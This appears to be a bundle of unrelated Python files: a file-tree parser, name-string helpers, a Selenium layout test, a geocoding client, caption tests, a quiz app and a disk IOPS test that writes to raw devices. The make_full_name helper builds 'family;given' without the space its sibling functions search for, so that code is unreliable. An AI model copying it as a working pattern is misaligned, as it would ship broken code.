根据指定的模式对文件夹进行解析,其递归的结果就是文件树。
将文件夹分为以下内容:
================ =================================== ======================
类别 标准 以Python为例的解释
================ =================================== ======================
核心文件 后缀名为 ``.suffix`` 的文件 Python模块
非核心文件 后缀名不为 ``.suffix`` 的文件 其他文件
核心文件夹 包含 ``core.suffix`` 的文件夹 Python包
非核心文件夹 不包含 ``core.suffix`` 的文件夹 其他文件夹
================ =================================== ======================
这四部分将分别采用不同的方式进行处理。
有一些额外的点需要说明,(这里仅以python文件结构为例):
#. __init__.py 将不会显示在核心文件和非核心文件中;
Args:
directory: 需要计算文件树的文件夹。
exclude: 需要排除的模式,采用标准库的fnmatch进行匹配。
Returns:
整理后的文件树
"""
self.directory = path.abspath(directory)
self.exclude_patterns = exclude
@cached_property
def filtered_sub_paths(self):
"""定义基本的基于用户的 ``exclude`` 参数的过滤器"""
result = glob.glob(path.join(self.directory, '*'))
for file_path in result.copy(): # iterate over a copy: removing items in place would disturb the iteration
# drop files and directories the user asked to exclude
if any(fnmatch(file_path, pattern) for pattern in self.exclude_patterns):
result.remove(file_path)
continue
# every other path list is derived from this one, so sorting once here means no other place needs to sort
return sorted(result)
@cached_property
def sub_files(self) -> List[str]:
"""子文件的路径列表,包括核心文件、其他文件及索引文件。"""
return [child for child in self.filtered_sub_paths if path.isfile(child)]
@cached_property
def sub_core_files(self) -> List[str]:
"""核心子文件的路径列表。"""
# 判断后缀是否是核心文件的后缀
result = [file for file in self.sub_files if path.splitext(file)[1] in self.SUFFIXES]
# 判断基本名是否不是基本名
result = [p for p in result if path.splitext(path.split(p)[1])[0] != self.CORE_NAME]
return result
@cached_property
def sub_other_files(self):
# keep files whose suffix is not one of the core suffixes
result = [file for file in self.sub_files if path.splitext(file)[1] not in self.SUFFIXES]
# drop files whose base name is the core name (e.g. __init__)
result = [p for p in result if path.splitext(path.split(p)[1])[0] != self.CORE_NAME]
return result
@cached_property
def sub_directories(self) -> List['FileTreeNode']:
"""子文件夹,包括核心文件夹和其他文件夹"""
return [FileTreeNode(child, self.exclude_patterns) for child in self.filtered_sub_paths if path.isdir(child)]
@cached_property
def sub_core_directories(self) -> List['FileTreeNode']:
"""子包"""
result = [node for node in self.sub_directories if node.is_core_directory]
return result
@cached_property
def sub_other_directories(self) -> List['FileTreeNode']:
"""其他文件夹"""
return [d for d in self.sub_directories if not d.is_core_directory]
@cached_property
def is_core_directory(self) -> bool:
"""是否是核心包"""
# 取删去文件夹后的基本名
sub_files = [path.split(file)[1] for file in self.sub_files]
# 判断是否包含索引文件
for suffix in self.SUFFIXES:
if f'{self.CORE_NAME}{suffix}' in sub_files:
return True
return False
class PythonFileTreeNode(FileTreeNode):
@cached_property
def filtered_sub_paths(self):
"""定义针对Python的过滤器"""
result = super(PythonFileTreeNode, self).filtered_sub_paths.copy()
for file_path in result.copy(): # 这里要采用复制,因为遍历过程的原位删除会改变其遍历过程
dir_name, file_name = path.split(file_path)
base_name, ext_name = path.splitext(file_name)
# drop files and directories starting with ``.`` or ``_``, except for names of the form ``__*__``
if base_name.startswith(('.', '_')) and not (base_name.startswith('__') and base_name.endswith('__')):
result.remove(file_path)
continue
# drop the ``__pycache__`` directory
if path.isdir(file_path) and base_name == '__pycache__':
result.remove(file_path)
continue
return result
class RstFileTreeNode(FileTreeNode):
"""
针对 `.rst` 文件结构的过滤器,用于对生成后的文档结构进行识别。
主要是用于增量更新的过程中,需要判断哪些文件是无用的需要删除的。
本类实现了对 ``.rst`` 文件结构的过滤,可以用于配合 ``PythonFileTreeNode`` 找出这些需要被删除的文件。
这个类暂时没有派上用场。
"""
SUFFIXES = ('.md', '.rst')
CORE_NAME = 'index'
|
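# Usage sketch for the file-tree module above (not part of the original file): walking a
# package with PythonFileTreeNode and printing the core files of every core directory.
# The directory path and exclude patterns are illustrative assumptions.
def print_core_files(node: FileTreeNode, indent: int = 0) -> None:
    """Recursively print the core files of a node and of its core sub-directories."""
    for file in node.sub_core_files:
        print(' ' * indent + path.split(file)[1])
    for child in node.sub_core_directories:
        print(' ' * indent + path.split(child.directory)[1] + '/')
        print_core_files(child, indent + 2)

if __name__ == '__main__':
    tree = PythonFileTreeNode('./my_package', exclude=['*/tests/*'])
    print_core_files(tree)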
def make_full_name(given_name, family_name):
"""Return a string in this form "family_name; given_name".
For example, if this function were called like this:
make_full_name("Sally", "Brown"), it would return "Brown; Sally".
"""
full_name = f"{family_name};{given_name}"
return full_name
def extract_family_name(full_name):
"""Extract and return the family name from a
string in this form "family_name; given_name".
For example, if this function were called like this:
extract_family_name("Brown; Sally"), it would return "Brown".
"""
# Find the index where "; " appears within the full name string.
semicolon_index = full_name.index("; ")
# Extract a substring from the full name and return it.
family_name = full_name[0 : semicolon_index]
return family_name
def extract_given_name(full_name):
"""Extract and return the given name from a
string in this form "family_name; given_name".
For example, if this function were called like this:
extract_given_name("Brown; Sally"), it would return "Sally".
"""
# Find the index where "; " appears within the full name string.
semicolon_index = full_name.index("; ")
# Extract a substring from the full name and return it.
given_name = full_name[semicolon_index + 2 : ]
return given_name
|
############################################################################
# Copyright 2015 Valerio Morsella #
# #
# Licensed under the Apache License, Version 2.0 (the "License"); #
# you may not use this file except in compliance with the License. #
# You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
# See the License for the specific language governing permissions and #
# limitations under the License. #
############################################################################
import os
import unittest
from galenpy.galen_api import Galen
from galenpy.galen_report import TestReport, info_node, warn_node, error_node
from galenpy.galen_webdriver import GalenRemoteWebDriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
class GalenTestBase(unittest.TestCase):
def __init__(self, methodName='runTest'):
super(GalenTestBase, self).__init__(methodName)
def setUp(self):
self.driver = GalenRemoteWebDriver("http://localhost:4444/wd/hub", desired_capabilities=DesiredCapabilities.CHROME)
def tearDown(self):
if self.driver:
self.driver.quit()
def check_layout(self, test_name, specs, included_tags, excluded_tags):
try:
parent_dir = os.path.abspath(os.path.join(os.path.dirname(__file__) + '/..'))
test_report = TestReport(test_name)
check_layout_report = Galen().check_layout(self.driver, os.path.join(parent_dir, "test", "specs", specs),
included_tags, excluded_tags)
test_report.add_report_node(info_node("Running layout check for: " + test_name)
.with_node(warn_node('this is just an example'))
.with_node(error_node('to demonstrate reporting'))) \
.add_layout_report_node("check " + specs, check_layout_report).finalize()
if check_layout_report.errors > 0:
raise AssertionError(
"Incorrect layout: " + test_name + " - Number of errors " + str(check_layout_report.errors))
except Exception as e:
raise e
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import json
import urllib
import urllib2
from django.utils.translation import ugettext_lazy as _
from geopy import Nominatim
from geopy.exc import GeocoderTimedOut
class GeoLocator(object):
base_address_url = 'http://www.mapquestapi.com/geocoding/v1/address'
base_route_url = 'http://www.mapquestapi.com/directions/v2/route'
home_address = 'Am Quellenberg A 1a, Dürrröhrsdorf-Dittersbach'
def get_location_coordinates(self, key, address):
# use mapquest
address = self._escape_address(address)
quoted_address = urllib.quote(address)
url = self.base_address_url + '?key={0}&location={1}'.format(key, quoted_address)
response = urllib2.urlopen(url)
result = json.load(response)
try:
loc = result['results'][0]['locations'][0]
return {
'lat': loc['latLng']['lat'],
'long': loc['latLng']['lng'],
}
except Exception:
pass
# if no location was found use nominatim
geolocator = Nominatim(
format_string="%s, Landkreis Sächsische Schweiz-Osterzgebirge, Sachsen, 01833, Deutschland")
try:
locations = geolocator.geocode(address, False)
except GeocoderTimedOut:
locations = None
if locations:
location = locations[0]
return {
'lat': float(location.latitude),
'long': float(location.longitude),
# 'address': location.address,
# 'raw': location.raw,
}
return {}
def get_route(self, key, to_address, from_address=None):
home = from_address if from_address else self.home_address
home = self._escape_address(home)
to_address = self._escape_address(to_address)
quoted_address = urllib.quote(to_address)
quoted_home = urllib.quote(home)
url_route = self.base_route_url + '?key={0}&from={1}&to={2}&locale=de_DE&unit=k'.format(
key, quoted_home, quoted_address)
response = urllib2.urlopen(url_route)
result = json.load(response)
try:
route = result['route']
dist = route['distance']
minutes, seconds = divmod(route['time'], 60)
return {
'distance': _('{0} km').format(round(dist, 3)),
'time': _('{0} min {1} s').format(minutes, seconds),
}
except Exception:
pass
return {}
def _escape_address(self, address):
character_mapping = {
0xe4: u'ae',
ord(u'ö'): u'oe',
ord(u'ü'): u'ue',
ord(u'ß'): u'ss',
}
return address.translate(character_mapping)
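# Usage sketch (illustrative only): both lookups need a MapQuest API key; the key and the
# address below are placeholder assumptions, not values from this project.
if __name__ == '__main__':
    locator = GeoLocator()
    coords = locator.get_location_coordinates('YOUR_MAPQUEST_KEY', u'Hauptstraße 1, Dürrröhrsdorf-Dittersbach')
    route = locator.get_route('YOUR_MAPQUEST_KEY', u'Hauptstraße 1, Dürrröhrsdorf-Dittersbach')
    print(coords)
    print(route)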
|
import json
from src.domain.text.caption import Caption
from src.domain.text.emphasis import Emphasis
from src.domain.text.properties import Properties
def test_caption_initializes():
caption = Caption(1, "start", "end", "test text", None)
assert caption.index == 1
assert caption.start == "start"
assert caption.end == "end"
assert caption.text == "test text"
def test_load_from_json():
with open("../../../data/caption.emphasis.v3.json") as f:
data = json.load(f)
caption_data = data['captions'][1]
properties = Properties([Emphasis.from_dict(emph) for emph in caption_data["properties"]["emphasis"]])
caption = Caption.from_dict(caption_data)
assert caption.index == 2
assert caption.start == "00:00:08,720"
assert caption.end == "00:00:14,480"
assert caption.text == "The spike around 1000 calories represents standard burrito orders"
assert caption.properties == properties
|
'''Core interpreter module for the question bank.'''
import sys
import objects
import datetime #datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")
from configuration import *
import os
from random import shuffle
class Application():
'''Revision (study) application.'''
def __init__(self):
# question bank data
self.Qlibrary = {} # question bank: {chapter A: list(question objects), chapter B: ...}
self.Qerror = [] # wrongly answered questions
self.Qfavorites = [] # bookmarked questions (e.g. ones that were guessed right)
# user information
self.user = "Frozen"
# application state
self.running = True
def __del__(self):
print("Goodbye {} !".format(self.user))
def init(self):
'''Initialise the application.'''
print("Current mode:",APP_MODE)
self.load() # load the file and build the question bank
if APP_MODE == "DEBUG":
print("Checking question bank integrity")
self.check_library()
def start(self):
'''Start the application.'''
self.init() # initialisation
# user login (not implemented yet)
while self.running: # main application loop
self.menu()
self.exit()
def exit(self):
'''Exit the application.'''
if APP_OPT_SAVE_AUTO:
self.save()
print("The current wrong answers and bookmarks have been exported automatically")
def menu(self):
'''Main menu.'''
print("\n{}\n".format(datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")))
print(APP_TITILE)
print("1. Chapter test in original order")
print("2. Chapter test in shuffled order")
print("3. Whole-bank test in shuffled order")
print("A. Export wrong answers + bookmarks (saving clears the in-memory records)")
print("Others:Exit")
op = self.user_input()
if op == '1':
self.test_unit()
elif op == '2':
self.test_unit(_random=True)
elif op == '3':
self.test_random()
elif op == 'A':
self.save()
else: self.running = False
def save(self):
'''Save the wrong answers and the bookmarks separately; exceptions are not handled due to time constraints.'''
T = datetime.datetime.now().strftime("%Y-%m-%d_%H-%M")
if self.Qerror:# if there are wrong answers
path_errors = './datas/ERRORS-' + T
fp_e = open(path_errors + '.txt','w')
fp_e.write(pattern.Chapter+'Wrong answers-'+T+'\n')
if APP_OPT_SAVE_MARKDOWN:# also write a Markdown version if requested
fp_e_m = open(path_errors + '.md','w')
fp_e_m.write('# Wrong answers-'+T+'\n')
for e in self.Qerror:
fp_e.write(e.info_original())
if APP_OPT_SAVE_MARKDOWN:
fp_e_m.write(e.info_markdown())
if APP_OPT_SAVE_MARKDOWN:fp_e_m.close()
print("Wrong answers saved in: {}".format(os.path.abspath('./datas')))
fp_e.close()
else:
print("There are currently no wrong answers")
if self.Qfavorites:# if there are bookmarks
path_favor = './datas/FAVOR-' + T
fp_f = open(path_favor + '.txt','w')
fp_f.write(pattern.Chapter+'Bookmarks-'+T+'\n')
if APP_OPT_SAVE_MARKDOWN:# also write a Markdown version if requested
fp_f_m = open(path_favor + '.md','w')
fp_f_m.write('# Bookmarks-'+T+'\n')
for f in self.Qfavorites:
fp_f.write(f.info_original())
if APP_OPT_SAVE_MARKDOWN:
fp_f_m.write(f.info_markdown())
if APP_OPT_SAVE_MARKDOWN:fp_f_m.close()
print("Bookmarked questions saved in: {}".format(os.path.abspath('./datas')))
fp_f.close()
else:
print("There are currently no bookmarked questions")
self.Qerror.clear()
self.Qfavorites.clear()
def test_unit(self,_random=False):
'''Per-chapter test (pass _random=True for a shuffled test).'''
while True:
print("-------- Please choose the chapter number to test --------")
cnt = ord('A')
for chapter,quetions in self.Qlibrary.items():
print("({}): {} number of questions: {}".format(chr(cnt),chapter,len(quetions)))
cnt += 1
print("[Others:Exit]")
op = self.user_input().upper()
if op: op=op[0]
if not 'A'<=op<chr(cnt):
print(">>[Exit, or the chapter number is out of range]")
break
else:
op = ord(op)-ord('A')
cnt = 0
for chapter,quetions in self.Qlibrary.items():
if cnt == op:
qsum = len(quetions)
asum = 1
cnt_right = 0
questionS = quetions[:]
if _random : shuffle(questionS)
for q in questionS:
ratio_right = 0.0
if asum > 1:
ratio_right = cnt_right*100/(asum-1)
print("\n测试进度:{}/{} [{:.1f}%] 当前正确率:{}/{} [{:.1f}%]\n".
format(asum,qsum,asum*100/qsum,cnt_right,asum-1,ratio_right))
right = q.test()
if right: cnt_right += 1#统计正确率
else:
self.Qerror.append(q)#将错题加入错题集
asum += 1
# statistics
# not done yet
ans = input(prompt.NEXT).strip()
if ans == 'e':
return
elif ans == 's':
self.Qfavorites.append(q) # add to bookmarks
break
cnt += 1
def test_random(self):
'''Shuffled test over the whole question bank.'''
questions = []
for qlist in self.Qlibrary.values():
for q in qlist:
questions.append(q)
shuffle(questions)
qsum = len(questions)
asum = 1
cnt_right = 0
for q in questions:
ratio_right = 0.0
if asum > 1:
ratio_right = cnt_right*100/(asum-1)
print("\n测试进度:{}/{} [{:.1f}%] 当前正确率:{}/{} [{:.1f}%]\n".
format(asum,qsum,asum*100/qsum,cnt_right,asum-1,ratio_right))
right = q.test()
if right: cnt_right += 1#统计正确率
else:
self.Qerror.append(q)#将错题加入错题集
asum += 1
# statistics
# not done yet
ans = input(prompt.NEXT).strip()
if ans == 'e':
return
elif ans == 's':
self.Qfavorites.append(q) # add to bookmarks
def user_input(self):
return input("[{}]>>".format(self.user)).strip()
def load(self):
'''Read the question bank file.'''
with open(FILE_PATH,'r',encoding=FILE_CODER) as fp:
if not fp:
print("{}: failed to load the question bank file".format(__class__))
sys.exit(-1)
content = fp.readlines()
self.parser(content) # parse the content and build Qlibrary
def parser(self,content):
'''Parse the question bank file according to the configuration settings.'''
chapter = "" # current chapter
question = ""
options = ""
answer = ""
currentType = None # type of data currently being processed; since readlines is used, some lines may not match any pattern
for line in content:
if line.isspace(): continue
#print(type(line)) # it is of type str
category = pattern.match(line)
if category == 'C':# a new chapter
currentType = category
chapter = line
self.Qlibrary[chapter]=[] # initialise this chapter
elif category =='Q':# a new question
currentType = category
if question:# unless this is the first question, add the previous one to the bank
self.Qlibrary[chapter].append(objects.Problem(question,options,answer))
question = line# start a new question
options = ""
answer = ""
elif category == 'O':# reached the options
currentType = category
options += line # options may span several matching lines, so they are concatenated
elif category == 'A':# reached the answer
currentType = category
answer = line
else:# no matching type
if not currentType:
print("{}: unknown data type, please check the file and the matching rules".format(__class__))
sys.exit(-1)
if currentType == 'C':
chapter+=line
elif currentType == 'Q':
question+=line
elif currentType == 'O':
options+=line
elif currentType == 'A':
answer+=line
if question:# store the final question once all lines have been processed
self.Qlibrary[chapter].append(objects.Problem(question,options,answer))
def show_library(self):
'''Print the question bank (for testing).'''
for chapter,questions in self.Qlibrary.items():
print("{}".format(chapter))
for q in questions:
q.show()
def check_library(self):
'''Check that every question in the bank is complete.'''
for chapter,questions in self.Qlibrary.items():
num = 1
for q in questions:
res = q.check()
if res:
print("{}{}:\n{}".format(chapter,num,res))
num+=1
APP = Application() #singleton
if __name__ == "__main__":
APP.init()
|
def init_actions_(service, args):
"""
this needs to return a mapping of actions representing the dependencies between actions.
Look at ACTION_DEPS in this module for an example of what is expected
"""
return {
'test': ['install']
}
def test(job):
import sys
try:
log = j.logger.get('test')
log.addHandler(j.logger._LoggerFactory__fileRotateHandler('tests'))
log.info('Test started')
service = job.service
vm_os = service.producers.get('os')[0]
vm_exe = vm_os.executor.prefab
log.info('Install fio')
vm_exe.core.run('apt-get update')
vm_exe.core.run('echo "Y" | apt-get install fio')
log.info('Run fio on vdb, iops should be less than maxIOPS')
vm = service.producers['node'][0]
disk = vm.producers['disk'][0]
maxIOPS = disk.model.data.maxIOPS
readBytesSec = disk.model.data.readBytesSec
writeBytesSec = disk.model.data.writeBytesSec
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('b1', 'vdb')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'b1')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'b1')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > maxIOPS]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > readBytesSec or float_listBytes[1] > writeBytesSec:
service.model.data.result = 'FAILED : {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
log.info('Create another data disk (vdc) and set max_iops to 1000')
vdc = vm.producers['vdc'][0]
g8client = vdc.producers["g8client"][0]
config_instance = "{}_{}".format(g8client.aysrepo.name, g8client.model.data.instance)
client = j.clients.openvcloud.get(instance=config_instance, create=False, die=True, sshkey_path="/root/.ssh/ays_repos_key")
acc = client.account_get(vdc.model.data.account)
space = acc.space_get(vdc.model.dbobj.name, vdc.model.data.location)
machine = space.machines[vm.name]
disk_id = machine.add_disk(name='disk_c', description='test', size=50, type='D')
machine.disk_limit_io(disk_id, 0, 4000000, 4000000, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1000)
log.info('Run fio on vdc, iops should be less than 1000')
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('c1', 'vdc')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'c1')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'c1')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > 1000]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > 4000000 or float_listBytes[1] > 4000000:
service.model.data.result = 'FAILED : {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
log.info('Run fio on vdc, iops should be less than 500')
machine.disk_limit_io(disk_id, 0, 2000000, 2000000, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 500)
fio_cmd = "fio --ioengine=libaio --group_reporting --filename=/dev/{1} "\
"--runtime=30 --readwrite=randrw --size=500M --name=test{0} "\
"--output={0}".format('c2', 'vdc')
vm_exe.core.run(fio_cmd)
outIops = vm_exe.core.run("cat %s | grep -o 'iops=[0-9]\{1,\}' | cut -d '=' -f 2" % 'c2')
listIops = outIops[1].split('\n')
outBytes = vm_exe.core.run("cat %s | grep -o 'bw=[0-9]\{1,\}\.[0-9]\{1,\}' | cut -d '=' -f 2" % 'c2')
listBytes = outBytes[1].split('\n')
int_listIops = [int(i) for i in listIops if int(i) > 500]
float_listBytes = [float(i) * 1000 for i in listBytes]
iops = len(int_listIops)
if iops != 0 or float_listBytes[0] > 2000000 or float_listBytes[1] > 2000000:
service.model.data.result = 'FAILED : {}'.format('test_limit_iops: disk limit not properly set')
service.save()
return
service.model.data.result = 'OK : {} '.format('test_limit_iops')
except:
service.model.data.result = 'ERROR : {} {}'.format('test_limit_iops', str(sys.exc_info()[:2]))
log.info('Test Ended')
service.save()
|